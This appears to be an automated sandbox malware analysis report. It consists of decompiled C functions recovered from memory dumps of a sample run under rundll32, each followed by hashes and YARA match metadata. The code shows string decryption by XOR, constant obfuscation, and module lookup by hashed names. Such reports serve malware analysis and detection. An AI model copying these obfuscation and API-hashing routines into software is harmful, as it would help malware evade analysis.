                                                                      • Instruction Fuzzy Hash: F0513775D1021AEFEF08DFA4C9465EEBBB2FF44310F208159E415AB290D7B89A51CF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 86%
                                                                      			E020047B5(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				signed int _v40;
                                                                      				signed int _v44;
                                                                      				signed int _v48;
                                                                      				signed int _v52;
                                                                      				signed int _v56;
                                                                      				signed int _v60;
                                                                      				signed int _v64;
                                                                      				signed int _v68;
                                                                      				intOrPtr _v72;
                                                                      				char _v592;
                                                                      				void* _t127;
                                                                      				void* _t133;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t127);
                                                                      				_v68 = _v68 & 0x00000000;
                                                                      				_v64 = _v64 & 0x00000000;
                                                                      				_v72 = 0x50be0a;
                                                                      				_v24 = 0xa904;
                                                                      				_v24 = _v24 + 0xe5cc;
                                                                      				_v24 = _v24 ^ 0x597c5b93;
                                                                      				_push(0x1ff142c);
                                                                      				_v24 = _v24 * 0x54;
                                                                      				_v24 = _v24 ^ 0x5d49852f;
                                                                      				_v32 = 0x6077;
                                                                      				_v32 = _v32 + 0xffffd427;
                                                                      				_v32 = _v32 + 0x605a;
                                                                      				_v32 = _v32 << 0xe;
                                                                      				_v32 = _v32 ^ 0x253e0470;
                                                                      				_v16 = 0x766e;
                                                                      				_v16 = _v16 ^ 0x0e68fc54;
                                                                      				_v16 = _v16 + 0x5b78;
                                                                      				_v16 = _v16 + 0xffff6155;
                                                                      				_v16 = _v16 ^ 0x0e6822fb;
                                                                      				_v36 = 0x46d0;
                                                                      				_v36 = _v36 | 0xbf6b54fd;
                                                                      				_v36 = _v36 >> 4;
                                                                      				_v36 = _v36 + 0xffffefba;
                                                                      				_v36 = _v36 ^ 0x0bf6ca05;
                                                                      				_v60 = 0xe881;
                                                                      				_v60 = _v60 + 0xb91a;
                                                                      				_v60 = _v60 ^ 0x0001fd39;
                                                                      				_v48 = 0xb097;
                                                                      				_v48 = _v48 ^ 0xf0f26416;
                                                                      				_v48 = _v48 ^ 0xf0f2a086;
                                                                      				_v12 = 0xfe0b;
                                                                      				_v12 = _v12 * 0x6d;
                                                                      				_v12 = _v12 + 0xe3c7;
                                                                      				_v12 = _v12 + 0xffff63fe;
                                                                      				_v12 = _v12 ^ 0x006c422a;
                                                                      				_v40 = 0xb7e6;
                                                                      				_v40 = _v40 ^ 0x86f830c6;
                                                                      				_v40 = _v40 ^ 0x86f8ac5d;
                                                                      				_v28 = 0xaa43;
                                                                      				_v28 = _v28 >> 3;
                                                                      				_v28 = _v28 ^ 0xaa541b7f;
                                                                      				_v28 = _v28 + 0xffff7b49;
                                                                      				_v28 = _v28 ^ 0xaa53dcd3;
                                                                      				_v56 = 0xcf43;
                                                                      				_v56 = _v56 * 0x49;
                                                                      				_v56 = _v56 ^ 0x003b1f16;
                                                                      				_v20 = 0xfc45;
                                                                      				_v20 = _v20 + 0xffba;
                                                                      				_v20 = _v20 + 0xaf52;
                                                                      				_v20 = _v20 >> 0xc;
                                                                      				_v20 = _v20 ^ 0x00007f51;
                                                                      				_v52 = 0x343e;
                                                                      				_v52 = _v52 + 0xffff8ecd;
                                                                      				_v52 = _v52 ^ 0xffffad90;
                                                                      				_v44 = 0x9594;
                                                                      				_v44 = _v44 * 0x28;
                                                                      				_v44 = _v44 ^ 0x001772e3;
                                                                      				_v8 = 0x6cd9;
                                                                      				_v8 = _v8 + 0xffff1db8;
                                                                      				_v8 = _v8 + 0xffffd279;
                                                                      				_v8 = _v8 ^ 0xb0257305;
                                                                      				_v8 = _v8 ^ 0x4fda3672;
                                                                      				_push(_v36);
                                                                      				_push(_v16);
                                                                      				_t133 = E01FF5DFC(_v24, _v32, _v8);
                                                                      				E01FFECBD(_v60, _v8, _v24, _v48, _v12,  &_v592, _v40, __edx);
                                                                      				E02000D6D(_v28, _v56, _v20, _t133);
                                                                      				return E01FFEB1E(_v52, _v44, _v8,  &_v592);
                                                                      			}
























                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *Bl
                                                                      • API String ID: 0-1288706768
                                                                      • Opcode ID: 2d87b3f245fd69920e9e29bb4057e6ff342838413f7cad5c5b80aa8976cae807
                                                                      • Instruction ID: 143958f35c019c951fc7aa3bd93f01dc3255f64cc565685ef0bb7f70b2964844
                                                                      • Opcode Fuzzy Hash: 2d87b3f245fd69920e9e29bb4057e6ff342838413f7cad5c5b80aa8976cae807
                                                                      • Instruction Fuzzy Hash: C251DDB2C0130EABDF54CFA5D9898EEBBB1FF48314F208158E515762A0D3B95A49CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 90%
                                                                      			E02002631(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, intOrPtr _a8) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				unsigned int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				signed int _v36;
                                                                      				char _v40;
                                                                      				signed int _v44;
                                                                      				intOrPtr _v48;
                                                                      				intOrPtr _v52;
                                                                      				intOrPtr _v56;
                                                                      				void* _t92;
                                                                      				signed int _t109;
                                                                      				signed int _t110;
                                                                      				void* _t119;
                                                                      				signed int _t120;
                                                                      				void* _t123;
                                                                      
                                                                      				_t123 = __eflags;
                                                                      				_push(_a8);
                                                                      				_t119 = __edx;
                                                                      				_push(_a4);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				E02002550(_t92);
                                                                      				_v44 = _v44 & 0x00000000;
                                                                      				_v56 = 0x428c97;
                                                                      				_v52 = 0x699918;
                                                                      				_v48 = 0x4b9b3f;
                                                                      				_v16 = 0x691;
                                                                      				_t109 = 0x25;
                                                                      				_v16 = _v16 * 0x4b;
                                                                      				_v16 = _v16 * 0x44;
                                                                      				_v16 = _v16 ^ 0x0082d99d;
                                                                      				_v24 = 0xda4d;
                                                                      				_v24 = _v24 >> 2;
                                                                      				_v24 = _v24 + 0xa7aa;
                                                                      				_v24 = _v24 ^ 0x00009b39;
                                                                      				_v20 = 0x8ab8;
                                                                      				_v20 = _v20 + 0xbc5;
                                                                      				_v20 = _v20 + 0x8be6;
                                                                      				_v20 = _v20 ^ 0x00013aa9;
                                                                      				_v12 = 0x3e92;
                                                                      				_v12 = _v12 * 0x48;
                                                                      				_v12 = _v12 + 0xffff6b24;
                                                                      				_v12 = _v12 | 0xd8f0c2a4;
                                                                      				_v12 = _v12 ^ 0xd8f1a727;
                                                                      				_v36 = 0x20a;
                                                                      				_v36 = _v36 ^ 0x637f1cbb;
                                                                      				_v36 = _v36 ^ 0x637f1131;
                                                                      				_v8 = 0x38cb;
                                                                      				_v8 = _v8 ^ 0x7b367a31;
                                                                      				_v8 = _v8 << 1;
                                                                      				_v8 = _v8 / _t109;
                                                                      				_v8 = _v8 ^ 0x06a897b6;
                                                                      				_v28 = 0xa730;
                                                                      				_v28 = _v28 << 5;
                                                                      				_v28 = _v28 + 0x5f1e;
                                                                      				_v28 = _v28 ^ 0x00154d8c;
                                                                      				_v40 = E01FFA156();
                                                                      				_v32 = 0xde76;
                                                                      				_v32 = _v32 + 0x8a52;
                                                                      				_v32 = _v32 ^ 0x000168cc;
                                                                      				_v16 = 0x1d5e;
                                                                      				_t110 = 7;
                                                                      				_v16 = _v16 / _t110;
                                                                      				_v16 = _v16 >> 4;
                                                                      				_v16 = _v16 ^ 0x00000053;
                                                                      				_t120 = E01FFDF8A(_t110, _v16 % _t110, _t123, _v16, _v32);
                                                                      				E02009A27( &_v40, 1, _v12, _t120, _t119, _v36, _v8, _v28);
                                                                      				 *((short*)(_t119 + _t120 * 2)) = 0;
                                                                      				return 0;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1z6{
                                                                      • API String ID: 0-2122224799
                                                                      • Opcode ID: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
                                                                      • Instruction ID: 8540b6a95c800ea604097344eae72f1fe1a85b94da57b0fd3f6f869fb4f05580
                                                                      • Opcode Fuzzy Hash: ba165720bb9331fcc9edb768f8659e2843ce2937904f7b6f9b2030632d0d4806
                                                                      • Instruction Fuzzy Hash: BD41FFB1D00209EBEF04CFE6C94A5EEBBB1BF84308F108199D425B62A0D7B90B45CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1z6{
                                                                      • API String ID: 0-2122224799
                                                                      • Opcode ID: 9fa61a0daab0e8ff7785b0de2f7bf674fdbe98d46cc6ca9acc9c4015203d1668
                                                                      • Instruction ID: 5da534b21e1eddf842ef60467de7fe7ef259b7345eb49c1ee4d1c7c0be31a243
                                                                      • Opcode Fuzzy Hash: 9fa61a0daab0e8ff7785b0de2f7bf674fdbe98d46cc6ca9acc9c4015203d1668
                                                                      • Instruction Fuzzy Hash: 0C4100B1D00209EBEF04CFE5C94A5EEBBB5FB84308F108199E511B6290D7B80B55CF94
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 81%
                                                                      			E0200A966(void* __ecx, void* __edx, void* __eflags, intOrPtr _a8, intOrPtr _a12, signed int* _a16) {
                                                                      				intOrPtr _v4;
                                                                      				intOrPtr _v8;
                                                                      				intOrPtr _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				void* _t38;
                                                                      				signed int _t42;
                                                                      				signed int _t48;
                                                                      				signed int* _t51;
                                                                      				signed int _t53;
                                                                      				void* _t60;
                                                                      				signed int _t64;
                                                                      				signed int _t65;
                                                                      				void* _t71;
                                                                      				intOrPtr _t72;
                                                                      				signed int* _t74;
                                                                      				unsigned int _t77;
                                                                      				signed int _t80;
                                                                      
                                                                      				_t51 = _a16;
                                                                      				_push(_t51);
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(0x1ff10ec);
                                                                      				_push(__edx);
                                                                      				_t38 = E02002550(0x1ff10ec);
                                                                      				_push(_t51);
                                                                      				_push(_t38);
                                                                      				E02002550(_t38);
                                                                      				_v12 = 0x4b1aac;
                                                                      				_t72 = 0;
                                                                      				_v8 = 0x6e8720;
                                                                      				_v4 = 0;
                                                                      				_v28 = 0x88f3;
                                                                      				_v28 = _v28 >> 2;
                                                                      				_v28 = _v28 ^ 0x975e54be;
                                                                      				_v28 = _v28 + 0xe7d8;
                                                                      				_v28 = _v28 ^ 0x975f6258;
                                                                      				_v24 = 0xe148;
                                                                      				_t53 = 0x36;
                                                                      				_v24 = _v24 / _t53;
                                                                      				_v24 = _v24 ^ 0x00006f46;
                                                                      				_t42 =  *0x1ff10ec; // 0x7d7b62b8
                                                                      				_t64 =  *0x1ff10f0; // 0x7d7b62d2
                                                                      				_t65 = _t64 ^ _t42;
                                                                      				_v20 = _t42;
                                                                      				_v16 = _t65;
                                                                      				_t77 =  !=  ? (_t65 & 0xfffffffc) + 4 : _t65;
                                                                      				_t48 = E01FF54FB(_t77);
                                                                      				_v24 = _t48;
                                                                      				if(_t48 != 0) {
                                                                      					_t74 = 0x1ff10f4;
                                                                      					_t71 =  <  ? 0 :  &(0x1ff10f4[_t77 >> 2]) - 0x1ff10f4 + 3 >> 2;
                                                                      					if(_t71 != 0) {
                                                                      						_t80 = _v20;
                                                                      						_t60 = _t48 - 0x1ff10f4;
                                                                      						do {
                                                                      							_t72 = _t72 + 1;
                                                                      							 *(_t60 + _t74) =  *_t74 ^ _t80;
                                                                      							_t34 =  &(_t74[1]); // 0x21a8adb8
                                                                      							_t74 = _t34;
                                                                      						} while (_t72 < _t71);
                                                                      						_t48 = _v24;
                                                                      					}
                                                                      					if(_t51 != 0) {
                                                                      						 *_t51 = _v16;
                                                                      						return _t48;
                                                                      					}
                                                                      				}
                                                                      				return _t48;
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Fo
                                                                      • API String ID: 0-989300405
                                                                      • Opcode ID: 82294903065e47e8895b5bd65213128193e5f3d466d4026489f5734ff717f7d1
                                                                      • Instruction ID: dad7a9e6c5358501a0ba313421a81f5412c47e619dda647ac40e55ebc34e3c62
                                                                      • Opcode Fuzzy Hash: 82294903065e47e8895b5bd65213128193e5f3d466d4026489f5734ff717f7d1
                                                                      • Instruction Fuzzy Hash: 2431CF717083449FE754DF6AC88085BBBEAEFC8304F80892DF98983294DB75D8068B12
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Fo
                                                                      • API String ID: 0-989300405
                                                                      • Opcode ID: aac4d8590ea3ad44cebb468c9db13773b583fba6e11cb25d81e01db20ea26708
                                                                      • Instruction ID: 49e3a59814c74bb21fffed7e500de0c18d81bb99cc272e06e312731783513348
                                                                      • Opcode Fuzzy Hash: aac4d8590ea3ad44cebb468c9db13773b583fba6e11cb25d81e01db20ea26708
                                                                      • Instruction Fuzzy Hash: D431DFB1618341AFE758DF29C88185BBBEAEBC8304F80892DF485C3654DB75D80ACF12
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 84%
                                                                      			E0200CF31(void* __ecx, void* __edx, void* __eflags) {
                                                                      				void* _t35;
                                                                      				signed int _t39;
                                                                      				unsigned int* _t51;
                                                                      				signed int _t52;
                                                                      				signed int _t54;
                                                                      				signed int _t59;
                                                                      				unsigned int _t60;
                                                                      				unsigned int _t61;
                                                                      				unsigned int* _t65;
                                                                      				signed int* _t67;
                                                                      				signed int* _t68;
                                                                      				signed int* _t69;
                                                                      				unsigned int _t71;
                                                                      				void* _t77;
                                                                      				void* _t79;
                                                                      				void* _t81;
                                                                      				void* _t82;
                                                                      
                                                                      				_t69 =  *(_t81 + 0x2c);
                                                                      				_push(_t69);
                                                                      				_push( *((intOrPtr*)(_t81 + 0x30)));
                                                                      				_push(__edx);
                                                                      				E02002550(_t35);
                                                                      				 *((intOrPtr*)(_t81 + 0x28)) = 0x2f20f4;
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				asm("stosd");
                                                                      				 *(_t81 + 0x1c) = 0xdb93;
                                                                      				_t67 =  &(_t69[1]);
                                                                      				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf590e5f;
                                                                      				 *(_t81 + 0x1c) =  *(_t81 + 0x1c) ^ 0xcf59d9ad;
                                                                      				 *(_t81 + 0x40) = 0x4aee;
                                                                      				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xd;
                                                                      				 *(_t81 + 0x40) =  *(_t81 + 0x40) >> 0xb;
                                                                      				 *(_t81 + 0x40) =  *(_t81 + 0x40) ^ 0x00002cea;
                                                                      				_t54 =  *_t69;
                                                                      				_t68 =  &(_t67[1]);
                                                                      				_t39 =  *_t67 ^ _t54;
                                                                      				 *(_t81 + 0x20) = _t54;
                                                                      				 *(_t81 + 0x24) = _t39;
                                                                      				_t20 = _t39 + 1; // 0x1
                                                                      				_t71 =  !=  ? (_t20 & 0xfffffffc) + 4 : _t20;
                                                                      				_t82 = _t81 + 0xc;
                                                                      				_t51 = E01FF54FB(_t71);
                                                                      				 *(_t82 + 0x34) = _t51;
                                                                      				if(_t51 != 0) {
                                                                      					_t79 = 0;
                                                                      					_t65 = _t51;
                                                                      					_t77 =  >  ? 0 :  &(_t68[_t71 >> 2]) - _t68 + 3 >> 2;
                                                                      					if(_t77 != 0) {
                                                                      						_t52 =  *(_t82 + 0x14);
                                                                      						do {
                                                                      							_t59 =  *_t68;
                                                                      							_t68 =  &(_t68[1]);
                                                                      							_t60 = _t59 ^ _t52;
                                                                      							 *_t65 = _t60;
                                                                      							_t65 =  &(_t65[1]);
                                                                      							_t61 = _t60 >> 0x10;
                                                                      							 *((char*)(_t65 - 3)) = _t60 >> 8;
                                                                      							 *(_t65 - 2) = _t61;
                                                                      							_t79 = _t79 + 1;
                                                                      							 *((char*)(_t65 - 1)) = _t61 >> 8;
                                                                      						} while (_t79 < _t77);
                                                                      						_t51 =  *(_t82 + 0x34);
                                                                      					}
                                                                      					 *((char*)(_t51 +  *((intOrPtr*)(_t82 + 0x18)))) = 0;
                                                                      				}
                                                                      				return _t51;
                                                                      			}





















                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,
                                                                      • API String ID: 0-48859977
                                                                      • Opcode ID: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
                                                                      • Instruction ID: b5598cd58902d972aa761d5cc5ef37b9c692ad9ed19713d8fa8edac6217a9eaa
                                                                      • Opcode Fuzzy Hash: 5ce2485613cba5a6437e7217406bc29238c0f0aad0300714a2d7ecf3c9a30912
                                                                      • Instruction Fuzzy Hash: 8231AB32A097518FE315CF2CC88555BFBE0EF99704F054A6DEA8997341C771E90ACB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: ,
                                                                      • API String ID: 0-48859977
                                                                      • Opcode ID: b7babf8be26eab1100141104debef1777e84d1ab42b81237bf176bb25377396b
                                                                      • Instruction ID: 95bc406f6b5952ab464dfe453b8abb720b319dee620eb3824a919531edcf88fb
                                                                      • Opcode Fuzzy Hash: b7babf8be26eab1100141104debef1777e84d1ab42b81237bf176bb25377396b
                                                                      • Instruction Fuzzy Hash: 5F319C326193518FD318DF2CC48155BFBE0EF98704F454A6DEA85A7301D770EA0ACB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: YQ
                                                                      • API String ID: 0-919377280
                                                                      • Opcode ID: 832c9db957fb198b4f060a0ba3ba27daba2b91c64806fc125af17a29fa887a50
                                                                      • Instruction ID: 2ff5d46927c8a0ec1a4ed6ea244db99ac7d93875dfa79e5c723b30fcf407b2ae
                                                                      • Opcode Fuzzy Hash: 832c9db957fb198b4f060a0ba3ba27daba2b91c64806fc125af17a29fa887a50
                                                                      • Instruction Fuzzy Hash: D3213572D0021DEBDF05DFE5D80A9DFBBB2EB84704F108099E914A7250C7BA5A64DF80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 100%
                                                                      			E02000223(intOrPtr _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				signed int _v24;
                                                                      				signed int _v28;
                                                                      				signed int _v32;
                                                                      				intOrPtr _v36;
                                                                      				intOrPtr _v40;
                                                                      				signed int _t69;
                                                                      				signed int _t73;
                                                                      				intOrPtr* _t79;
                                                                      				intOrPtr* _t80;
                                                                      				void* _t81;
                                                                      
                                                                      				_v32 = _v32 & 0x00000000;
                                                                      				_v40 = 0x1d1d13;
                                                                      				_v36 = 0x222c2b;
                                                                      				_v20 = 0x8e6b;
                                                                      				_v20 = _v20 >> 1;
                                                                      				_v20 = _v20 << 6;
                                                                      				_v20 = _v20 ^ 0x0011cb3d;
                                                                      				_v16 = 0xc711;
                                                                      				_v16 = _v16 >> 0xa;
                                                                      				_t73 = 0xe;
                                                                      				_v16 = _v16 * 0x46;
                                                                      				_v16 = _v16 ^ 0x000025d9;
                                                                      				_v12 = 0x5a6f;
                                                                      				_v12 = _v12 >> 0xe;
                                                                      				_v12 = _v12 << 0x10;
                                                                      				_v12 = _v12 * 0x7c;
                                                                      				_v12 = _v12 ^ 0x007c57cb;
                                                                      				_v24 = 0xc850;
                                                                      				_v24 = _v24 | 0x7c4bf75d;
                                                                      				_v24 = _v24 ^ 0x7c4b9b6b;
                                                                      				_v28 = 0x7391;
                                                                      				_v28 = _v28 + 0x5592;
                                                                      				_v28 = _v28 ^ 0x0000ce0e;
                                                                      				_v8 = 0x1617;
                                                                      				_v8 = _v8 / _t73;
                                                                      				_v8 = _v8 >> 0xb;
                                                                      				_v8 = _v8 * 0x60;
                                                                      				_v8 = _v8 ^ 0x00003b9a;
                                                                      				_t79 =  *((intOrPtr*)(E01FF3278() + 0xc)) + 0xc;
                                                                      				_t80 =  *_t79;
                                                                      				while(_t80 != _t79) {
                                                                      					_t58 = _t80 + 0x30; // 0xfef84d81
                                                                      					_t69 = E01FF165C( *_t58, _v12, _v24, _v28, _v8);
                                                                      					_t81 = _t81 + 0xc;
                                                                      					if((_t69 ^ 0x1f8fefc1) == _a4) {
                                                                      						_t60 = _t80 + 0x18; // 0xe845c718
                                                                      						return  *_t60;
                                                                      					}
                                                                      					_t80 =  *_t80;
                                                                      				}
                                                                      				return 0;
                                                                      			}


















                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: +,"
                                                                      • API String ID: 0-654858841
                                                                      • Opcode ID: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction ID: e42703cada249f5d132eb0aa4741175f11764e6f80e08880b6c8871f23f32ba5
                                                                      • Opcode Fuzzy Hash: 36948431c4fa179cd8bab93fa242a1fc78fd0d12126f49712600092e518b7711
                                                                      • Instruction Fuzzy Hash: A3312271D04609EBEB04CFA5C98A99EFBB1FB44314F208599C516B7290D3B46B84DF84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: %<
                                                                      • API String ID: 0-2252717727
                                                                      • Opcode ID: d0c9b719ae2acfba52d1ca39c39c417e0af17c540289deb21c027bbdd74d7c36
                                                                      • Instruction ID: 72c33dc5a6ab519386dc24a022420ef7960236451ddd1b93c7c45d62cc9be5b7
                                                                      • Opcode Fuzzy Hash: d0c9b719ae2acfba52d1ca39c39c417e0af17c540289deb21c027bbdd74d7c36
                                                                      • Instruction Fuzzy Hash: BB21F2B5C0131DEBEB48DFA6C90A5AEBFB4EB00318F108498D425B6290D3B84B14DF92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 79%
                                                                      			E020009B8(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a12) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				signed int _v20;
                                                                      				intOrPtr _v24;
                                                                      				intOrPtr _v28;
                                                                      				intOrPtr _v32;
                                                                      				intOrPtr _t54;
                                                                      				signed int _t62;
                                                                      				signed int _t63;
                                                                      
                                                                      				_push(_a12);
                                                                      				_push(_a8);
                                                                      				_push(0);
                                                                      				_push(__edx);
                                                                      				_push(__ecx);
                                                                      				_t54 = E02002550(0);
                                                                      				_v28 = _t54;
                                                                      				_v24 = _t54;
                                                                      				_v32 = 0x34e779;
                                                                      				_v20 = 0xed53;
                                                                      				_v20 = _v20 >> 2;
                                                                      				_v20 = _v20 << 6;
                                                                      				_v20 = _v20 ^ 0x000ef232;
                                                                      				_v16 = 0x8c43;
                                                                      				_t62 = 0x6e;
                                                                      				_v16 = _v16 * 0x16;
                                                                      				_t63 = 0x43;
                                                                      				_v16 = _v16 / _t62;
                                                                      				_v16 = _v16 | 0xa5153760;
                                                                      				_v16 = _v16 ^ 0xa5150d1d;
                                                                      				_v12 = 0x71b1;
                                                                      				_v12 = _v12 | 0x28689702;
                                                                      				_v12 = _v12 ^ 0x24ff525f;
                                                                      				_v12 = _v12 ^ 0x99266ed7;
                                                                      				_v12 = _v12 ^ 0x95b1ff33;
                                                                      				_v8 = 0x9915;
                                                                      				_v8 = _v8 >> 0xb;
                                                                      				_v8 = _v8 / _t63;
                                                                      				_v8 = _v8 >> 8;
                                                                      				_v8 = _v8 ^ 0x0000698b;
                                                                      				return E0200E232(_v20, _v16, __edx, _a12, _v12, _t63, _v8);
                                                                      			}

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088728503.0000000001FF0000.00000040.00020000.sdmp, Offset: 01FF0000, based on PE: true
                                                                      • Associated: 00000007.00000002.2088750821.0000000002010000.00000040.00020000.sdmp Download File
                                                                      • Associated: 00000007.00000002.2088754763.0000000002012000.00000040.00020000.sdmp Download File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_1ff0000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: y4
                                                                      • API String ID: 0-35764640
                                                                      • Opcode ID: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
                                                                      • Instruction ID: ad89ed099a4cf87c504ff50c56a105c9755625239e5fd656351dd5015f73be11
                                                                      • Opcode Fuzzy Hash: 85987d0af05f291c1bba09fd4deff99604705c1734ec6e85378ee402cbfd5748
                                                                      • Instruction Fuzzy Hash: 242112B1D01219EBEB08DFE9C84A8DEBBB1FB44300F108199E525A62A0D7B95751DF90
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000007.00000002.2088195670.0000000000230000.00000040.00000001.sdmp, Offset: 00230000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_7_2_230000_rundll32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: y4
                                                                      • API String ID: 0-35764640
                                                                      • Opcode ID: b78e4ec7b0daa4de19488d10b39de6a407231f003e24876a1e2b7fd591ae7ca5
